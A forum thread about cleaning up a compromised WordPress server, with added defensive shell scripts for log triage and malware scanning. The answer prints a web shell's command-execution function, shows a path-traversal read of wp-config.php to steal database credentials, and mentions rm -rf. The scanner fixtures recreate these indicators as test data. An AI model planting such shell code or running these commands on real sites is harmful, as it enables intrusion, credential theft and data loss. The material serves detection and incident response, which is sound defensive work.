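Editor's note: the poster checked the log by hand with a single grep. The helper below is an added example (not code from the thread or from DigitalOcean) that does the same triage over a whole access log: it lists every PHP file under wp-content that receives POST requests, with the request count and the number of distinct client addresses. The log lines are constructed in the same Apache combined format as the post; the addresses and the cache.php path are made up.

```shell
#!/bin/sh
# Added triage helper, not code from the thread. Lists PHP files under
# wp-content that are being POSTed to, how often, and from how many distinct
# client addresses. The sample log below is constructed (made-up IPs); on a
# real server point the function at /var/log/apache2/access.log instead.

SAMPLE_LOG="$(mktemp)"
cat > "$SAMPLE_LOG" <<'EOF'
203.0.113.10 - - [13/Feb/2017:14:03:36 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "-" "Mozilla/5.0 (X11; Linux x86_64)"
198.51.100.7 - - [13/Feb/2017:14:04:14 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0+(compatible; UptimeRobot/2.0)"
203.0.113.11 - - [13/Feb/2017:14:06:39 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "-" "Mozilla/5.0 (X11; Ubuntu)"
203.0.113.11 - - [13/Feb/2017:14:06:56 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php?x=1 HTTP/1.1" 200 333 "-" "Mozilla/5.0 (X11; Ubuntu)"
203.0.113.12 - - [13/Feb/2017:14:07:00 -0500] "POST /wp-content/uploads/2017/02/cache.php HTTP/1.1" 200 12 "-" "Mozilla/5.0"
198.51.100.8 - - [13/Feb/2017:14:08:00 -0500] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 40 "-" "Mozilla/5.0"
198.51.100.8 - - [13/Feb/2017:14:08:30 -0500] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.9 - - [13/Feb/2017:14:09:00 -0500] "GET /wp-content/themes/twentysixteen/style.css HTTP/1.1" 200 5000 "-" "Mozilla/5.0"
EOF

# Print "requests distinct_ips path" for each PHP file under wp-content that
# was POSTed to, busiest first. Normal WordPress traffic posts to index.php,
# wp-login.php, wp-comments-post.php, xmlrpc.php and wp-admin/*; a .php file
# inside a theme, plugin or upload directory that takes POSTs directly is the
# pattern of a dropped web shell. Caveat: a few plugins expose their own
# endpoints, so treat the output as a list to inspect, not a verdict.
suspicious_php_posts() {
    awk '
        $6 == "\"POST" && $7 ~ /^\/wp-content\/.*\.php([?]|$)/ {
            path = $7
            sub(/\?.*/, "", path)          # drop any query string
            hits[path]++
            if (!((path, $1) in seen)) {   # count each client address once per path
                seen[path, $1] = 1
                ips[path]++
            }
        }
        END { for (p in hits) printf "%d %d %s\n", hits[p], ips[p], p }
    ' "$1" | sort -rn
}

suspicious_php_posts "$SAMPLE_LOG"
```

On the poster's own log the first line of output would be the global32.php path the answer below singles out; the many distinct source addresses hitting one theme-CSS-directory PHP file with a 200 response is the tell, since no theme ships a PHP file there.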

3 Answers
jtittle1 February 14, 2017
Accepted Answer

@sebastiankade

There are a few plugins that you can enable to tighten up security -- such as Wordfence Security. A plugin, however, will only carry you so far.

There are a number of potential causes, though one is happening now and that's attacks on the JSON API. If you're not using WordPress 4.7.2, you're vulnerable.

That said, if you've upgraded and there's still code that allows remote execution of code, even the security release update won't matter as you need to find the source of the attack.

Recommendations

What I would recommend doing is installing the Wordfence Security plugin and letting it perform an initial scan and see what pops up.

Also, this file seems to pop up quite often in the errors you're showing. Find out what it is and if it's not something you've setup, remove it.

/wp-content/themes/twentysixteen/css/global32.php

Additionally, check your directory permissions. If any directory is set up with a CHMOD of 777, fix it by changing it to 755.

To do this quickly, you can run something such as:

find /var/www/html -type d -exec chmod 755 {} \;

What the above command will do is recursively change all directories to a CHMOD of 755 from ./html and down.

You can do the same for files, which should be CHMOD 644.

find /var/www/html -type f -exec chmod 644 {} \;

Depending on how Apache is setup, this may prevent you from installing plugins or modifying files, though for the time being, that's not as much of an issue since we are in the process of trying to figure out where the attack is or is heading.

Are you keeping your server, your Wordpress and your plugins/themes up to date?

@sebastiankade

As an update, regarding the hack/breach, here are the details.

Hopefully my previous response was at least somewhat helpful. Taking a closer look at the base64 code that you provided, once decoded, it's actually a PHP/JS script that allows a remote attacker to essentially run any command that they wish.

It's not limited to basic commands such as getting a directory listing using ls or ls -al either. I ran a few tests on a throw away Droplet and it will allow an attacker to quickly and easily delete your files so this is something you need to handle quickly if there's anything that's of importance.

They are protecting the script with an MD5 hashed password in an attempt to keep it locked down. When successfully logged in you see a black screen and an input/output box. The input accepts any command and the output box shows the results of said command.

So other than creating and deleting files, what good does it do? Well, I did say any command, and that means shell commands.

The part of the script that handles this is this function:

function handle_cmd() {
    system($_POST['cmd']." 2>&1");
}

The above runs a provided shell command and silences the output.

Why does this matter?

Let's say this script is what the global32.php file is. If I'm the attacker and I log in, I can see that my file is located at:

./wp-content/themes/twentysixteen/css/global32.php

So now in the code box of my script, I'll run:

cat ../../../../../wp-config.php

... and now I have your MySQL Database Credentials and I know what prefix you're using for your DB. That means that if further code is injected, the attacker can begin to work his/her way in to your DB and cause more havoc than just adding/tampering with files.

Equally as bad, an attacker could also simply run rm -rf and delete all files/directories in one fell swoop.
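Editor's note: the answer above gives two chmod sweeps and describes two indicators (the eval(base64_decode(...)) loader from the question and a $_POST-driven system() call like handle_cmd). The script below is an added example, not code from the thread or from DigitalOcean. It builds a throw-away directory tree that stands in for /var/www/html, seeds it with constructed files carrying those indicators (the base64 payload is a placeholder), and provides three functions: list world-writable paths, list PHP files carrying either indicator, and run the answer's two permission sweeps with the document root as a parameter.

```shell
#!/bin/sh
# Added example, not code from the thread. $ROOT is a constructed stand-in for
# /var/www/html; the file contents below are fixtures, and the base64 payload
# is a placeholder rather than a real one.

ROOT="$(mktemp -d)"
mkdir -p "$ROOT/wp-content/themes/twentysixteen/css" "$ROOT/wp-content/uploads"

cat > "$ROOT/wp-content/themes/twentysixteen/functions.php" <<'EOF'
<?php
// ordinary theme file: no indicator, must not be flagged
add_action('init', 'twentysixteen_setup');
EOF

cat > "$ROOT/wp-config.php" <<'EOF'
<?php
eval(base64_decode("PAYLOAD_PLACEHOLDER"));
define('DB_NAME', 'example');
EOF

cat > "$ROOT/wp-content/themes/twentysixteen/css/global32.php" <<'EOF'
<?php
function handle_cmd() {
    system($_POST['cmd']." 2>&1");
}
EOF

chmod -R go-w "$ROOT"                                            # sane baseline regardless of umask
chmod 777 "$ROOT/wp-content/uploads"                             # the misconfiguration the answer warns about
chmod 666 "$ROOT/wp-content/themes/twentysixteen/functions.php"  # a world-writable file

# Directories and files that any local user, including a compromised PHP
# process running as the web server user, can write to.
world_writable() {
    find "$1" \( -type d -o -type f \) -perm -002 -print | sort
}

# PHP files containing either indicator. Fixed-string matching (-F) so the
# parentheses and the $ in $_POST are taken literally, -l prints file names.
suspicious_php() {
    find "$1" -type f -name '*.php' -exec grep -lF -e 'eval(base64_decode(' -e 'system($_POST' {} + | sort
}

# The two sweeps from the answer, parameterised on the document root.
normalize_permissions() {
    find "$1" -type d -exec chmod 755 {} \;
    find "$1" -type f -exec chmod 644 {} \;
}

echo "world-writable before:"; world_writable "$ROOT"
echo "suspicious PHP files:";  suspicious_php "$ROOT"
```

Run the two list functions against the real document root before cleaning up, so there is a record of what was dropped where, and again after. The two grep patterns are only the signatures shown in this thread; a scanner such as the Wordfence plugin the answer recommends also compares core and theme files against known-good copies, which catches loaders that are obfuscated differently.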

  • Thanks @jtittle I have installed Wordfence and running the scan helped me find and delete a whole bunch of these!

    It seems a little crazy that to simply have a WordPress blog that doesn't get destroyed I have to have so many security "plugins" :D

    Thanks for your help.

    • @sebastiankade

      No problem at all, always happy to help!

      I know it seems a bit odd at first, though when you compare an application to a web server, you begin to see the similarities.

      Just as you wouldn't want to run a web server without a working firewall that's capable of deterring would-be attackers from attempting to connect to any port available, you really don't want to run an application without some sort of security measures in place.

      On the server side of things, you run a firewall, ensure proper permissions are set to your files and directories, make sure you're running as a non-privileged user when it comes to setting up your websites (i.e. root or a sudo user doesn't own your web directory or the files within it), disable root login via SSH and use a sudo user to login, etc.

      On the web, or public-facing side of things, you want to make sure you're equally protected against threats. Wordfence is a good solution and will help you to reduce the number of successful attacks, though there's quite a bit more that can be done in regards to making sure this doesn't happen again. It can be time consuming, and this certainly isn't limited to just WordPress -- it applies to any web-facing property.

      That being said, I would highly recommend changing your WordPress Database details ASAP, once you're sure the attack is mitigated and cleaned up.

      If I was attacking your website, I'd definitely copy and paste those details first just in case I see an opening that allows me to connect remotely. By default, MySQL and MariaDB, on most installations, do not allow remote connections, though on some packages they do, thus if I had your credentials in hand and I see that I can log in, I could do whatever I want to your database (i.e. posts, pages, etc.). I could also inject new users that you may not notice and ultimately work towards gaining administrative privileges.

      A quick password reset once I have a user that's marked as an admin and I'm in.

      When it comes to attacks, assume the worst is possible and keep that in mind when you're cleaning up. Don't assume the attacker is ignorant or a script kiddy that just has way too much time on their hands and is bent on simply marking your site as a spam target. Make the assumption that what they are after is total control and with that mindset, make sure you change passwords and alter anything that would otherwise allow this to happen again.
